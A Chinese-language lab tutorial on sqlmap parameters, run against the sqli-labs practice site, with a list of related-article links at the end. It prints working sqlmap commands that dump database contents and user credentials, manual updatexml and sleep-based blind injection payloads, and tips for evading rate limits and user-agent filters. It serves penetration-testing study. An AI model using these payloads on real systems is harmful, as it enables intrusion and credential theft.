sqlmap工具之参数使用
文章目录
- sqlmap-参数使用
- sqlmap-基础实验
- 实验目的
- 实验环境
- 实验内容
- get方式注入
- post方式注入
- user-agent注入
- 时间延时盲注
- 限制了同一个IP的请求间隔,间隔2秒,请求速度快会提示
- 限制了ua,post提交数据,直接—data攻击会失败,需要执行ua或者用--random-agent参数
- 免责声明
sqlmap-参数使用
开启实验环境
实验介绍
sqlmap-基础实验
实验目的
- 练习sqlmap各种参数
实验环境
- 目标机:window server 2008
- 目标机: sql-lab靶场
实验内容
- sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。
- 它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
- sqlmap支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等数据库的各种安全漏洞检测。
- sqlmap支持五种不同的注入模式:
注入 | 秒速 |
---|---|
基于布尔的盲注 | 即可以根据返回页面判断条件真假的注入; |
基于时间的盲注, | 即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断; |
基于报错注入, | 即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中; |
联合查询注入, | 可以使用union的情况下的注入; |
堆查询注入, | 可以同时执行多条语句的执行时的注入。 |
get方式注入
测试sqlmap参数,库+表+字段+数据。
测试 payload
sqlmap -u http://192.168.232.220/sqli-labs-master/Less-2/?id=1
获取所有数据库:
sqlmap -u http://192.168.232.220/sqli-labs-master/Less-2/?id=1 --dbs
获取 security 库下的表
sqlmap -u "http://192.168.232.222/sqli-labs-master/Less-2/?id=1" -D security -T users --tables
获取users表下的字段,需要使用 --hex 参数
sqlmap -u "http://192.168.232.222/sqli-labs-master/Less-2/?id=1" -D security -T users --columns --hex
获取 users表下的所有数据
sqlmap -u "http://192.168.232.222/sqli-labs-master/Less-2/?id=1" -D security -T users --columns --dump
post方式注入
第一步 使用burp抓取post数据包,并将数据包保存
第二步 更改数据包,使用*设置注入点
第三步 使用-r指定文本进行注入
第四步 获取数据库信息
python sqlmap.py -r post.txt -f --banner --current-db
python sqlmap.py -r post.txt -D security -T users -C id,username,password --dump
方法二:使用 --data 参数
sqlmap -u "http://192.168.232.224/sqli-labs-master/Less-11/" --date="uname=admin&passwd=admin"
user-agent注入
第一步 我们输入正确的用户名和密码的时候,后台会将User Agent
返回到屏幕上。
第二步 首先我们打开burp suite
拦截,将网页提交的Request Headers
保存到一个文本header.txt
中。
第三步 然后打开sqlmap
执行如下命令:sqlmap -r header.txt --batch
其中我们要将User-Agent
改为*
。
sqlmap -r header.txt -D security -T users --columns --dump
第四步 使用手工注入
- 获取当前数据库信息
' or updatexml(1, concat('#', database()), 0), 1, 1) #
- 查当前数据库下都有哪些数据表
' or updatexml(1, concat('#', (select group_concat(table_name) from information_schema.tables where table_schema="security")), 0), 1, 1) #
- 查
users
表的字段
' or updatexml(1, concat('#', (select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")), 0), 1, 1) #
- 查询
users
表的所有值
' or updatexml(1, concat('#', (select group_concat(username,'|',password) from users)), 0), 1, 1) #
时间延时盲注
第一步 判断注入点
?id=1" and 1=1 --+
?id=1" and 1=2 --+ 返回的结果一模一样。
无法判断id的类型,于是使用:
?id=1" and sleep(5) --+ 发现网站返回页面有明显的延迟。
第二步 使用Intruder获取数据库长度,发现数据库名称长度是8
?id=1" and if(length(database())=1, sleep(5), 1) --+
第三步 获取数据库名,
?id=1" and if( ascii(substr(database(), 1, 1))=115, sleep(5),1) --+
通过取出的字母的assic值,判断字母
由上一步得知数据库长度是8
第四步 获得security下的表是四张
?id=1" and if((select count(*) from information_schema.tables where table_schema="security")=1, sleep(5), 1) --+
第五步 获得第四个表名的长度
?id=1" and if(length(select table_name from information_schema.tables where table_schema="security" limit 3, 1)=1, sleep(5), 1) --+
第五步 获得第四个表名
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 3, 1), 1, 1))=101, sleep(5), 1) --+
使用sqlmap进行延时
--time-sec 6
限制了同一个IP的请求间隔,间隔2秒,请求速度快会提示
需要sqlmap用–delay=2.5参数来利用
python sqlmap.py -u "http://172.16.12.2/req.php?id=1" --delay=2.5
获取所有库
python sqlmap.py -u "http://172.16.12.2/req.php?id=1" --delay=2.5 --dbs
获取 tips 库的数据
限制了ua,post提交数据,直接—data攻击会失败,需要执行ua或者用–random-agent参数
使用burp拦包,保存到文件 random.txt
使用 --random-agent 参数测试
python sqlmap.py -r random.txt --random-agent -v 2
- 获取 tips 库的数据
免责声明
本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果上传者概不负责!
sqlmap工具之参数使用相关推荐
- sqlmap工具使用用法详解
2019独角兽企业重金招聘Python工程师标准>>> sqlmap工具使用用法详解 QLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的 ...
- DVWA——使用sqlmap工具post注入
目录 环境工具 攻击步骤 一.获取并保存数据包 二.sqlmap注入攻击 1.获取数据库信息 2.获取MySQL数据库中的表 3.获取user表中的字段 4.获取用户名和密码 总结 环境工具 PS:s ...
- 【SQL注入15】自动化注入技术(基于sqlmap工具和sqli-labs-less1靶场平台)
目录 1 前言 2 实验介绍 2.1 实验平台 2.2 实验目标 3 实验过程 3.1 前戏 3.2 判断注入点及注入类型 3.3 爆库名 3.4 爆表名 3.5 爆字段名 3.6 爆字段内容 3.7 ...
- 【SQL注入-15】自动化注入案例—以sqli-labs-less9为例(利用sqlmap工具)
目录 1 前言 2 自动化注入案例-以sqli-labs-less9为例 2.1 实验平台 2.2 注入前准备 2.3 判断注入点及注入类型 2.3.1 自动判断注入点及注入类型 2.3.2 手动判断 ...
- 视频教程-SQL注入与SQLmap工具-漏洞挖掘与利用
SQL注入与SQLmap工具 玄道,从混迹漏洞平台与SRC应急响应中心的白帽子到创业乙方的技术与运营 刘畅 ¥15.00 立即订阅 扫码下载「CSDN程序员学院APP」,1000+技术好课免费看 AP ...
- SQLmap工具常用命令
SQLmap工具常用命令 SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具.它有一个非常棒的特性,即对检测与利用进行自动化处理,如获取数据库指纹.访问底层文件系统.执行命令等等.
- lisp 焊缝_超声波焊接工具性能参数求解与参数图绘制
1.焊接工具性能参数解决方案 #超声波焊接# 焊接工具的参数输入和溶液反馈界面,如图2所示. 该表格是使用Microsoft Excel电子表格软件进行编译和编程的.解决方案期间需要输入的基本信息包括 ...
- Windows 运行chkdsk磁盘修复工具命令参数详解
Windows 运行chkdsk磁盘修复工具命令参数详解 chkdsk是Windows系统自带的磁盘修复工具,通常在电脑非正常关机之后再开机,系统就会自动调用chkdsk工具进行磁盘扫描和修复.同时, ...
- Linux下查看某个进程打开的文件数-losf工具常用参数介绍
Linux下查看某个进程打开的文件数-losf工具常用参数介绍 作者:尹正杰 版权声明:原创作品,谢绝转载!否则将追究法律责任. 在linux操作系统中,一切皆文件.通过文件不仅仅可以访问常规数据,还 ...
最新文章
- 【PHPExcel】设置打印格式
- 使用Ubuntu 12.04作为日常电脑环境
- 程序组件通信方案集锦
- PHP基础3--文件加载-错误处理
- 分布式之系统底层原理
- 功能测试常用6种方法_16种常用的数据分析方法聚类分析
- 学会这些, 让你的服务器远离***影响
- 浅谈大前端的代表技术及其影响,值得我们思考
- Chapter7-1_Overview of NLP Tasks
- 人工智能进行时:人类的未来与未来的人类
- Python编程常见出错信息及原因分析(5):安装扩展库
- xssfsheet removerow 剩下空白行怎么处理_糟糕!开瓶时酒塞不小心掉进酒里该怎么处理?...
- ‘nvidia-smi‘ 不是内部或外部命令,也不是可运行的程序 或批处理文件。
- Python 错误记录(新手)
- 基于AR眼镜有哪类功能可实现?
- 计算机运行内存和显卡内存不足,Win10系统提示计算机显卡内存不足该怎么办?...
- GPL AND LGPL
- 计算机一级云居寺,刁常宇-Zhejiang University Personal homepage
- Unix 操作系统背后的女程序员 Lorinda Cherry 去世,享年 78 岁
- torch.sigmoid、torch.nn.Sigmoid和torch.nn.functional.sigmoid的区别